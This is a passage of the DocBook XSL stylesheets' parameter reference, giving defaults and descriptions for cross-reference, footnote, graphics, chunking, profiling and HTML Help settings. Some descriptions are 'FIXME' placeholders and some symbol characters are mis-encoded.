dvi2bitmap to get bitmap versions of equations for HTML -output. - - - - - - -tex.math.delims -boolean - - -tex.math.delims -Should be equations outputed for processing by TeX -automatically surrounded by math mode delimiters - - - - -<xsl:param name="tex.math.delims" select="'1'"></xsl:param> - - - -Description - -For compatibility with DSSSL based DBTeXMath from Allin Cottrell -you should set this parameter to 0. - - - - - - -pixels.per.inch -integer - - -pixels.per.inch -How many pixels are there per inch? - - - - -<xsl:param name="pixels.per.inch" select="90"></xsl:param> - - - -Description - -When lengths are converted to pixels, this value is used to -determine the size of a pixel. The default value is taken from the -XSL -Recommendation. - - - - - - - -points.per.em -number - - -points.per.em -Specify the nominal size of an em-space in points - - - - -<xsl:param name="points.per.em" select="10"></xsl:param> - - - -Description - -FIXME: - - - - - - -use.svg -boolean - - -use.svg -Allow SVG in the result tree? - - - - -<xsl:param name="use.svg" select="1"></xsl:param> - - - -Description - -If non-zero, SVG will be considered an acceptable image format. SVG -is passed through to the result tree, so correct rendering of the resulting -diagram depends on the formatter (FO processor or web browser) that is used -to process the output from the stylesheet. - - - - - - -use.role.as.xrefstyle -boolean - - -use.role.as.xrefstyle -Use role attribute for -xrefstyle on xref? - - - - -<xsl:param name="use.role.as.xrefstyle" select="1"></xsl:param> - - - -Description - -If non-zero, the role attribute on -xref will be used to select the cross reference style. -The DocBook -Technical Committee recently added an -xrefstyle attribute for this purpose. -If the xrefstyle attribute -is present, role will be ignored, regardless -of this setting. - -Until an official DocBook release that includes the new -attribute, this flag allows role -to serve that purpose. - - - -Example - -The following small stylesheet shows how to configure the stylesheets to make -use of the cross reference style: - -<?xml version="1.0"?> -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" - version="1.0"> - -<xsl:import href="../xsl/html/docbook.xsl"/> - -<xsl:output method="html"/> - -<xsl:param name="local.l10n.xml" select="document('')"/> -<l:i18n xmlns:l="http://docbook.sourceforge.net/xmlns/l10n/1.0"> - <l:l10n xmlns:l="http://docbook.sourceforge.net/xmlns/l10n/1.0" language="en"> - <l:context name="xref"> - <l:template name="chapter" style="title" text="Chapter %n, %t"/> - <l:template name="chapter" text="Chapter %n"/> - </l:context> - </l:l10n> -</l:i18n> - -</xsl:stylesheet> - -With this stylesheet, the cross references in the following document: - -<?xml version="1.0" encoding="utf-8"?> -<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN" - "http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"> -<book id="book"><title>Book</title> - -<preface> -<title>Preface</title> - -<para>Normal: <xref linkend="ch1"/>.</para> -<para>Title: <xref xrefstyle="title" linkend="ch1"/>.</para> - -</preface> - -<chapter id="ch1"> -<title>First Chapter</title> - -<para>Irrelevant.</para> - -</chapter> -</book> - -will appear as: - - -Normal: Chapter 1. -Title: Chapter 1, First Chapter. - - - - - - - -menuchoice.separator - - - -menuchoice.separator - - - - - -<xsl:param name="menuchoice.separator" select="'+'"></xsl:param> - - - -Description - -Separator used to connect items of a menuchoice other -than guimenuitem and guisubmenu. The latter -elements are linked with menuchoice.menu.separator. - - - - - - - -menuchoice.menu.separator - - - -menuchoice.menu.separator - - - - - -<xsl:param name="menuchoice.menu.separator" select="'->'"></xsl:param> - - - -Description - -Separator used to connect items of a menuchoice with -guimenuitem or guisubmenu. Other elements -are linked with menuchoice.separator. - - - - - - - -default.float.class -string - - -default.float.class -Specifies the default float class - - - - -<xsl:param name="default.float.class" select="'before'"></xsl:param> - - - -Description - -FIXME: - - - - - - -footnote.number.format -string - - -footnote.number.format -Identifies the format used for footnote numbers - - - - -<xsl:param name="footnote.number.format" select="'1'"></xsl:param> - - - -Description - -The footnote.number.format specifies the format -to use for footnote numeration (1, i, I, a, or A). - - - - - - -table.footnote.number.format -string - - -table.footnote.number.format -Identifies the format used for footnote numbers in tables - - - - -<xsl:param name="table.footnote.number.format" select="'a'"></xsl:param> - - - -Description - -The table.footnote.number.format specifies the format -to use for footnote numeration (1, i, I, a, or A) in tables. - - - - - - -footnote.number.symbols - - - -footnote.number.symbols - - - - - -<xsl:param name="footnote.number.symbols" select="''"></xsl:param> - - - -Description - -If footnote.number.symbols is not the empty string, -footnotes will use the characters it contains as footnote symbols. For example, -*&#x2020;&#x2021;&#x25CA;&#x2720; will identify -footnotes with *, ג€ , ג€¡, -ג—, and ג . If there are more footnotes -than symbols, the stylesheets will fall back to numbered footnotes using -footnote.number.format. - -The use of symbols for footnotes depends on the ability of your -processor (or browser) to render the symbols you select. Not all systems are -capable of displaying the full range of Unicode characters. If the quoted characters -in the preceding paragraph are not displayed properly, that's a good indicator -that you may have trouble using those symbols for footnotes. - - - - - - -table.footnote.number.symbols - - - -table.footnote.number.symbols - - - - - -<xsl:param name="table.footnote.number.symbols" select="''"></xsl:param> - - - -Description - -If table.footnote.number.symbols is not the empty string, -table footnotes will use the characters it contains as footnote symbols. For example, -*&#x2020;&#x2021;&#x25CA;&#x2720; will identify -footnotes with *, ג€ , ג€¡, -ג—, and ג . If there are more footnotes -than symbols, the stylesheets will fall back to numbered footnotes using -table.footnote.number.format. - -The use of symbols for footnotes depends on the ability of your -processor (or browser) to render the symbols you select. Not all systems are -capable of displaying the full range of Unicode characters. If the quoted characters -in the preceding paragraph are not displayed properly, that's a good indicator -that you may have trouble using those symbols for footnotes. - - - - - - -xref.with.number.and.title -boolean - - -xref.with.number.and.title -Use number and title in cross references - - - - -<xsl:param name="xref.with.number.and.title" select="1"></xsl:param> - - - -Description - -FIXME: - - - - - - -xref.label-page.separator -string - - -xref.label-page.separator -Punctuation or space separating label from page number in xref - - - -<xsl:param name="xref.label-page.separator"><xsl:text> </xsl:text></xsl:param> - - -Description - - -This parameter allows you to control the punctuation of certain -types of generated cross reference text. -When cross reference text is generated for an -xref or -olink element -using an xrefstyle attribute -that makes use of the select: feature, -and the selected components include both label and page -but no title, -then the value of this parameter is inserted between -label and page number in the output. -If a title is included, then other separators are used. - - - - - - - -xref.label-title.separator -string - - -xref.label-title.separator -Punctuation or space separating label from title in xref - - - -<xsl:param name="xref.label-title.separator">: </xsl:param> - - -Description - - -This parameter allows you to control the punctuation of certain -types of generated cross reference text. -When cross reference text is generated for an -xref or -olink element -using an xrefstyle attribute -that makes use of the select: feature, -and the selected components include both label and title, -then the value of this parameter is inserted between -label and title in the output. - - - - - - - -xref.title-page.separator -string - - -xref.title-page.separator -Punctuation or space separating title from page number in xref - - - -<xsl:param name="xref.title-page.separator"><xsl:text> </xsl:text></xsl:param> - - -Description - - -This parameter allows you to control the punctuation of certain -types of generated cross reference text. -When cross reference text is generated for an -xref or -olink element -using an xrefstyle attribute -that makes use of the select: feature, -and the selected components include both title and page number, -then the value of this parameter is inserted between -title and page number in the output. - - - - - - - -insert.xref.page.number -string - - -insert.xref.page.number -Turns page numbers in xrefs on and off - - - - -<xsl:param name="insert.xref.page.number">no</xsl:param> - - - -Description - -The value of this parameter determines if -cross references (xrefs) in -printed output will -include page number citations. -It has three possible values. - - - -no -No page number references will be generated. - - - -yes -Page number references will be generated -for all xref elements. -The style of page reference may be changed -if an xrefstyle -attribute is used. - - - -maybe -Page number references will not be generated -for an xref element unless -it has an -xrefstyle -attribute whose value specifies a page reference. - - - - - - - - - -Graphics - - -graphic.default.extension -string - - -graphic.default.extension -Default extension for graphic filenames - - - -<xsl:param name="graphic.default.extension"></xsl:param> - - -Description - -If a graphic or mediaobject -includes a reference to a filename that does not include an extension, -and the format attribute is -unspecified, the default extension will be used. - - - - - - - -default.image.width -length - - -default.image.width -The default width of images - - - - -<xsl:param name="default.image.width" select="''"></xsl:param> - - - -Description - -If specified, this value will be used for the -width attribute on -images that do not specify any -viewport -dimensions. - - - - - - -nominal.image.width -length - - -nominal.image.width -The nominal image width - - - - -<xsl:param name="nominal.image.width" select="6 * $pixels.per.inch"></xsl:param> - - - -Description - -Graphic widths expressed as a percentage are problematic. In the -following discussion, we speak of width and contentwidth, but -the same issues apply to depth and contentdepth. - -A width of 50% means "half of the available space for the image." -That's fine. But note that in HTML, this is a dynamic property and -the image size will vary if the browser window is resized. - -A contentwidth of 50% means "half of the actual image width". -But what does that mean if the stylesheets cannot assess the image's -actual size? Treating this as a width of 50% is one possibility, but -it produces behavior (dynamic scaling) that seems entirely out of -character with the meaning. - -Instead, the stylesheets define a -nominal.image.width and convert percentages to -actual values based on that nominal size. - - - - - - -nominal.image.depth -length - - -nominal.image.depth -Nominal image depth - - - - -<xsl:param name="nominal.image.depth" select="4 * $pixels.per.inch"></xsl:param> - - - -Description - -See nominal.image.width. - - - - - - -use.embed.for.svg -boolean - - -use.embed.for.svg -Use HTML embed for SVG? - - - - -<xsl:param name="use.embed.for.svg" select="0"></xsl:param> - - - -Description - -If non-zero, an embed element will be created for -SVG figures. An object is always created, -this parameter merely controls whether or not an additional embed -is generated inside the object. - -On the plus side, this may be more portable among browsers and plug-ins. -On the minus side, it isn't valid HTML. - - - - - - -make.graphic.viewport -boolean - - -make.graphic.viewport -Use tables in HTML to make viewports for graphics - - - - -<xsl:param name="make.graphic.viewport" select="1"></xsl:param> - - - -Description - -The HTML img element only supports the notion -of content-area scaling; it doesn't support the distinction between a -content-area and a viewport-area, so we have to make some compromises. - -If make.graphic.viewport is non-zero, a table -will be used to frame the image. This creates an effective viewport-area. - - -Tables and alignment don't work together, so this parameter is ignored -if alignment is specified on an image. - - - - - -preferred.mediaobject.role - - -preferred.mediaobject.role -Select which mediaobject to use based on -this value of an object's role attribute. - - - - - -<xsl:param name="preferred.mediaobject.role"></xsl:param> - - - -Description - -A mediaobject may contain several objects such as imageobjects. -If the parameter use.role.for.mediaobject -is non-zero, then the role attribute on -imageobjects and other objects within a mediaobject container will be used to select which object will be -used. If one of the objects has a role value that matches the -preferred.mediaobject.role parameter, then it has first -priority for selection. If more than one has such a -role value, the first one is used. - - -See the use.role.for.mediaobject parameter -for the sequence of selection. - - - - - -use.role.for.mediaobject -boolean - - -use.role.for.mediaobject -Use role attribute -value for selecting which of several objects within a mediaobject to use. - - - - - -<xsl:param name="use.role.for.mediaobject" select="1"></xsl:param> - - - -Description - -If non-zero, the role attribute on -imageobjects or other objects within a mediaobject container will be used to select which object will be -used. - - -The order of selection when then parameter is non-zero is: - - - - If the stylesheet parameter preferred.mediaobject.role has a value, then the object whose role equals that value is selected. - - -Else if an object's role attribute has a value of -html for HTML processing or -fo for FO output, then the first -of such objects is selected. - - - -Else the first suitable object is selected. - - - -If the value of -use.role.for.mediaobject -is zero, then role attributes are not considered -and the first suitable object -with or without a role value is used. - - - - - - -ignore.image.scaling -boolean - - -ignore.image.scaling -Tell the stylesheets to ignore the author's image scaling attributes - - - - -<xsl:param name="ignore.image.scaling" select="0"></xsl:param> - - - -Description - -If non-zero, the scaling attributes on graphics and media objects are -ignored. - - - - - - -Chunking - - -chunker.output.cdata-section-elements -string - - -chunker.output.cdata-section-elements -List of elements to escape with CDATA sections - - -<xsl:param name="chunker.output.cdata-section-elements" select="''"/> - - -Description - -This parameter specifies the list of elements that should be escaped -as CDATA sections by the chunking stylesheet. Not all processors support -specification of this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - - - - -chunker.output.doctype-public -string - - -chunker.output.doctype-public -Public identifer to use in the document type of generated pages - - -<xsl:param name="chunker.output.doctype-public" select="''"/> - - -Description - -This parameter specifies the public identifier that should be used by -the chunking stylesheet in the document type declaration of chunked pages. -Not all processors support specification of -this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - - - - -chunker.output.doctype-system -uri - - -chunker.output.doctype-system -System identifier to use for the document type in generated pages - - -<xsl:param name="chunker.output.doctype-system" select="''"/> - - -Description - -This parameter specifies the system identifier that should be used by -the chunking stylesheet in the document type declaration of chunked pages. -Not all processors support specification of -this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - - - - -chunker.output.encoding -string - - -chunker.output.encoding -Encoding used in generated pages - - -<xsl:param name="chunker.output.encoding" select="'ISO-8859-1'"/> - - -Description - -This parameter specifies the encoding to be used in files -generated by the chunking stylesheet. Not all processors support -specification of this parameter. - - -This parameter used to be named default.encoding. - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - - - - -chunker.output.indent -string - - -chunker.output.indent -Specification of indentation on generated pages - - -<xsl:param name="chunker.output.indent" select="'no'"/> - - -Description - -This parameter specifies the value of the indent -specification for generated pages. Not all processors support -specification of this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - - - - -chunker.output.media-type -string - - -chunker.output.media-type -Media type to use in generated pages - - -<xsl:param name="chunker.output.media-type" select="''"/> - - -Description - -This parameter specifies the media type that should be used by -the chunking stylesheet. Not all processors support specification of -this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - - - - -chunker.output.method -list -html -xml - - -chunker.output.method -Method used in generated pages - - -<xsl:param name="chunker.output.method" select="'html'"/> - - -Description - -This parameter specifies the output method to be used in files -generated by the chunking stylesheet. - - -This parameter used to be named output.method. - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - - - - -chunker.output.omit-xml-declaration - - - -chunker.output.omit-xml-declaration -Omit-xml-declaration for generated pages - - -<xsl:param name="chunker.output.omit-xml-declaration" select="'no'"/> - - -Description - -This parameter specifies the value of the omit-xml-declaration -specification for generated pages. Not all processors support -specification of this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - - - - -chunker.output.standalone -string - - -chunker.output.standalone -Standalone declaration for generated pages - - -<xsl:param name="chunker.output.standalone" select="'no'"/> - - -Description - -This parameter specifies the value of the standalone -specification for generated pages. Not all processors support -specification of this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - - - - -saxon.character.representation -string - - -saxon.character.representation -Saxon character representation used in generated HTML pages - - -<xsl:param name="saxon.character.representation" select="'entity;decimal'"/> - - -Description - -This character representation is used in files generated by chunking stylesheet. If -you want to suppress entity references for characters with direct representation -in default.encoding, set this parameter to value native. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - - - - -html.ext - - - -html.ext -Identifies the extension of generated HTML files - - - - -<xsl:param name="html.ext" select="'.html'"></xsl:param> - - - -Description - -The extension identified by html.ext will -be used as the filename extension for chunks created by this stylesheet. - - - - - - - -html.extra.head.links -boolean - - -html.extra.head.links -Toggle extra HTML head link information - - - - -<xsl:param name="html.extra.head.links" select="0"></xsl:param> - - - -Description - -If non-zero, extra link elements will be -generated in the head of chunked HTML files. These -extra links point to chapters, appendixes, sections, etc. as supported -by the Site Navigation Bar in Mozilla 1.0 (as of CR1, at least). - - - - - - - -root.filename - - - -root.filename -Identifies the name of the root HTML file when chunking - - - -<xsl:param name="root.filename" select="'index'"></xsl:param> - - -Description - -The root.filename is the base filename for -the chunk created for the root of each document processed. - - - - - - - -base.dir - - - -base.dir -The base directory of chunks - - - -<xsl:param name="base.dir" select="''"></xsl:param> - - -Description - -If specified, the base.dir identifies -the output directory for chunks. (If not specified, the output directory -is system dependent.) - - - - - - - generate.manifest - boolean - - - generate.manifest - Generate a manifest file? - - - - <xsl:param name="generate.manifest" select="0"></xsl:param> - - - Description - - If non-zero, a list of HTML files generated by the - stylesheet transformation is written to the file named by - the manifest parameter. - - - - - - - manifest - string - - - manifest - Name of manifest file - - - - <xsl:param name="manifest" select="'HTML.manifest'"></xsl:param> - - - Description - - The name of the file to which a manifest is written (if the - value of the generate.manifest parameter - is non-zero). - - - - - - -manifest.in.base.dir -boolean - - -manifest.in.base.dir -Should be manifest file written in $base.dir? - - - - -<xsl:param name="manifest.in.base.dir" select="0"></xsl:param> - - - -Description - -If non-zero manifest file and project files for HTML Help and -Eclipse Help are written into base.dir instead -of current directory. - - - - - - -chunk.toc -string - - -chunk.toc -An explicit TOC to be used for chunking - - - - -<xsl:param name="chunk.toc" select="''"></xsl:param> - - - -Description - -The chunk.toc identifies an explicit TOC that -will be used for chunking. This parameter is only used by the -chunktoc.xsl stylesheet (and customization layers built -from it). - - - - - - -chunk.tocs.and.lots -boolean - - -chunk.tocs.and.lots -Should ToC and LoTs be in separate chunks? - - - - -<xsl:param name="chunk.tocs.and.lots" select="0"></xsl:param> - - - -Description - -If non-zero, ToC and LoT (List of Examples, List of Figures, etc.) -will be put in a separate chunk. At the moment, this chunk is not in the -normal forward/backward navigation list. Instead, a new link is added to the -navigation footer. - -This feature is still somewhat experimental. Feedback welcome. - - - - - - -chunk.section.depth -integer - - -chunk.section.depth -Depth to which sections should be chunked - - - - -<xsl:param name="chunk.section.depth" select="1"></xsl:param> - - - -Description - -This parameter sets the depth of section chunking. - - - - - - -chunk.first.sections - - - -chunk.first.sections -Chunk the first top-level section? - - - - -<xsl:param name="chunk.first.sections" select="0"></xsl:param> - - - -Description - -If non-zero, a chunk will be created for the first top-level -sect1 or section elements in -each component. Otherwise, that section will be part of the chunk for -its parent. - - - - - - - -chunk.quietly - - - -chunk.quietly -Omit the chunked filename messages. - - - - -<xsl:param name="chunk.quietly" select="0"></xsl:param> - - - -Description - -If zero (the default), the XSL processor emits a message naming -each separate chunk filename as it is being output. -If nonzero, then the messages are suppressed. - - - - - - - -navig.graphics -boolean - - -navig.graphics -Use graphics in navigational headers and footers? - - - -<xsl:param name="navig.graphics" select="0"></xsl:param> - - -Description - -If true (non-zero), the navigational headers and footers in chunked -HTML are presented in an alternate style that uses -graphical icons for Next, Previous, Up, and Home. -Default graphics are provided in the distribution. - - - - - - - -navig.graphics.extension -string - - -navig.graphics.extension -Extension for navigational graphics - - - -<xsl:param name="navig.graphics.extension" select="'.gif'"></xsl:param> - - -Description - -Sets the filename extension to use on navigational graphics used -in the headers and footers of chunked HTML. - - - - - - -navig.graphics.path -string - - -navig.graphics.path -Path to navigational graphics - - - -<xsl:param name="navig.graphics.path">images/</xsl:param> - - -Description - -Sets the path, probably relative to the directory where the HTML -files are created, to the navigational graphics used in the -headers and footers of chunked HTML. - - - - - - - -navig.showtitles -boolean - - -navig.showtitles -Display titles in HTML headers and footers? - - - -<xsl:param name="navig.showtitles">1</xsl:param> - - -Description - -If true (non-zero), -the headers and footers of chunked HTML -display the titles of the next and previous chunks, -along with the words 'Next' and 'Previous' (or the -equivalent graphical icons if navig.graphics is true). -If false (zero), then only the words 'Next' and 'Previous' -(or the icons) are displayed. - - - - - - - -Profiling - -Following parameters can be used for attribute value based -profiling of your document. For more info about profiling look at -http://docbook.sourceforge.net/projects/xsl/doc/tools/profiling.html. - - - -profile.arch -string - - -profile.arch -Target profile for arch -attribute - - - - -<xsl:param name="profile.arch" select="''"></xsl:param> - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - - - - - -profile.condition -string - - -profile.condition -Target profile for condition -attribute - - - - -<xsl:param name="profile.condition" select="''"></xsl:param> - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - - - - - -profile.conformance -string - - -profile.conformance -Target profile for conformance -attribute - - - - -<xsl:param name="profile.conformance" select="''"></xsl:param> - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - - - - - -profile.lang -string - - -profile.lang -Target profile for lang -attribute - - - - -<xsl:param name="profile.lang" select="''"></xsl:param> - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - - - - - -profile.os -string - - -profile.os -Target profile for os -attribute - - - - -<xsl:param name="profile.os" select="''"></xsl:param> - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - - - - - -profile.revision -string - - -profile.revision -Target profile for revision -attribute - - - - -<xsl:param name="profile.revision" select="''"></xsl:param> - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - - - - - -profile.revisionflag -string - - -profile.revisionflag -Target profile for revisionflag -attribute - - - - -<xsl:param name="profile.revisionflag" select="''"></xsl:param> - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - - - - - -profile.role -string - - -profile.role -Target profile for role -attribute - - - - -<xsl:param name="profile.role" select="''"></xsl:param> - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - -Note that role is often -used for other purposes than profiling. For example it is commonly -used to get emphasize in bold font: - -<emphasis role="bold">very important</emphasis> - -If you are using role for -these purposes do not forget to add values like bold to -value of this parameter. If you forgot you will get document with -small pieces missing which are very hard to track. - -For this reason it is not recommended to use role attribute for profiling. You should -rather use profiling specific attributes like userlevel, os, arch, condition, etc. - - - - - - - -profile.security -string - - -profile.security -Target profile for security -attribute - - - - -<xsl:param name="profile.security" select="''"></xsl:param> - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - - - - - -profile.userlevel -string - - -profile.userlevel -Target profile for userlevel -attribute - - - - -<xsl:param name="profile.userlevel" select="''"></xsl:param> - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - - - - - -profile.vendor -string - - -profile.vendor -Target profile for vendor -attribute - - - - -<xsl:param name="profile.vendor" select="''"></xsl:param> - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - - - - - -profile.attribute -string - - -profile.attribute -Name of user-specified profiling attribute - - - - -<xsl:param name="profile.attribute" select="''"></xsl:param> - - - -Description - -This parameter is used in conjuction with profile.value. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - - - - - -profile.value -string - - -profile.value -Target profile for user-specified attribute - - - - -<xsl:param name="profile.value" select="''"></xsl:param> - - - -Description - -When you are using this parameter you must also specify name of -profiling attribute with parameter profile.attribute. - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, ג€¦) instead of normal -ones (docbook.xsl, -chunk.xsl, ג€¦). - - - - - - -profile.separator -string - - -profile.separator -Separator character for compound profile values - - - - -<xsl:param name="profile.separator" select="';'"></xsl:param> - - - -Description - -Separator character for compound profile values. - - - - - - -HTML Help - - -htmlhelp.encoding -string - - -htmlhelp.encoding -Character encoding to use in files for HTML Help compiler. - - - - -<xsl:param name="htmlhelp.encoding" select="'iso-8859-1'"></xsl:param> - - - -Description - -HTML Help Compiler is not UTF-8 aware, so you should always use -apropriate single-byte encoding here. - - - - - - -htmlhelp.autolabel -boolean - - -htmlhelp.autolabel -Should tree-like ToC use autonumbering feature? - - - - -<xsl:param name="htmlhelp.autolabel" select="0"></xsl:param> - - - -Description - -If you want to include chapter and section numbers into ToC in -the left panel, set this parameter to 1. - - - - - - -htmlhelp.chm -string - - -htmlhelp.chm -Filename of output HTML Help file. - - - - -<xsl:param name="htmlhelp.chm" select="'htmlhelp.chm'"></xsl:param> - - - -Description - -Change this parameter if you want different name of result -CHM file than htmlhelp.chm. - - - - - - -htmlhelp.default.topic -string - - -htmlhelp.default.topic -Name of file with default topic - - - - -<xsl:param name="htmlhelp.default.topic" select="''"></xsl:param> - - - -Description - -Normally first chunk of document is displayed when you open HTML -Help file. If you want to display another topic, simply set its -filename by this parameter. - -This is useful especially if you don't generate ToC in front of -your document and you also hide root element in ToC. E.g.: - -<xsl:param name="generate.book.toc" select="0"/> -<xsl:param name="htmlhelp.hhc.show.root" select="0"/> -<xsl:param name="htmlhelp.default.topic" select="'pr01.html'"/> - - - - - - -htmlhelp.display.progress -boolean - - -htmlhelp.display.progress -Display compile progress? - - - - -<xsl:param name="htmlhelp.display.progress" select="1"></xsl:param> - - - -Description - -You can swith off display of compile progress by setting this -parameter to 0. - - - - - - -htmlhelp.hhp -string - - -htmlhelp.hhp -Filename of project file. - - - - -<xsl:param name="htmlhelp.hhp" select="'htmlhelp.hhp'"></xsl:param> - - - -Description - -Change this parameter if you want different name of project -file than htmlhelp.hhp. - - - - - - -htmlhelp.hhc -string - - -htmlhelp.hhc -Filename of TOC file. - - - - -<xsl:param name="htmlhelp.hhc" select="'toc.hhc'"></xsl:param> - - - -Description - -Change this parameter if you want different name of TOC file -than toc.hhc. - - - - - - -htmlhelp.hhk -string - - -htmlhelp.hhk -Filename of index file. - - - - -<xsl:param name="htmlhelp.hhk" select="'index.hhk'"></xsl:param> - - - -Description - -Change this parameter if you want different name of index file -than index.hhk. - - - - - - -htmlhelp.hhp.tail -string - - -htmlhelp.hhp.tail -Additional content for project file. - - - - -<xsl:param name="htmlhelp.hhp.tail"></xsl:param> - - - -Description - -If you want to include some additional parameters into project file, -store appropriate part of project file into this parameter. - - - - - - -htmlhelp.hhp.window -string - - -htmlhelp.hhp.window -Name of default window. - - - - -<xsl:param name="htmlhelp.hhp.window" select="'Main'"></xsl:param> - - - -Description - -Name of default window. If empty no [WINDOWS] section will be -added to project file. - - - - - - -htmlhelp.hhp.windows -string - - -htmlhelp.hhp.windows -Definition of additional windows - - - - -<xsl:param name="htmlhelp.hhp.windows"></xsl:param> - - - -Description - -Content of this parameter is placed at the end of [WINDOWS] -section of project file. You can use it for defining your own -addtional windows. - - - - - - -htmlhelp.enhanced.decompilation -boolean - - -htmlhelp.enhanced.decompilation -Allow enhanced decompilation of CHM? - - - - -<xsl:param name="htmlhelp.enhanced.decompilation" select="0"></xsl:param> - - - -Description - -When set to 1 this parameter enables enhanced decompilation of CHM. - - - - - - -htmlhelp.enumerate.images -boolean - - -htmlhelp.enumerate.images -Should be paths to all used images added to project file? - - - - -<xsl:param name="htmlhelp.enumerate.images" select="0"></xsl:param> - - - -Description - -You should turn on this flag, if you insert images into your documents -as external binary entities or if you are using absolute path in image names. - - - - - - -htmlhelp.force.map.and.alias -boolean - - -htmlhelp.force.map.and.alias -Should be [MAP] and [ALIAS] section added to project file unconditionaly? - - - - -<xsl:param name="htmlhelp.force.map.and.alias" select="0"></xsl:param> - - - -Description - -You should turn on this flag, if you have your own -alias.h and contex.h files -and you want include reference to them in project file. - - - - - - -htmlhelp.map.file -string - - -htmlhelp.map.file -Filename of map file. - - - - -<xsl:param name="htmlhelp.map.file" select="'context.h'"></xsl:param> - - - -Description - -Change this parameter if you want different name of map file -than context.h. - - - - - - -htmlhelp.alias.file -string - - -htmlhelp.alias.file -Filename of map file. - - - - -<xsl:param name="htmlhelp.alias.file" select="'alias.h'"></xsl:param> - - - -Description - -Change this parameter if you want different name of map file -than alias.h. - - - - - - -htmlhelp.hhc.section.depth -integer - - -htmlhelp.hhc.section.depth -Depth of TOC for sections in a left pane. - - - - -<xsl:param name="htmlhelp.hhc.section.depth" select="5"></xsl:param> - - - -Description - -Change this parameter if you want shallower ToC in a left pane -of HTML Help viewer. - - - - - - -htmlhelp.hhc.show.root -boolean - - -htmlhelp.hhc.show.root -Should be entry for root element shown in ToC? - - - - -<xsl:param name="htmlhelp.hhc.show.root" select="1"></xsl:param> - - - -Description - -If set to 0, there will be no entry for root element in -ToC. This is useful when you want provide user with expanded ToC as -a default. - - - - - - -htmlhelp.hhc.folders.instead.books - - - -htmlhelp.hhc.folders.instead.books - - - - - -<xsl:param name="htmlhelp.hhc.folders.instead.books" select="1"></xsl:param> - - - -Description - -This 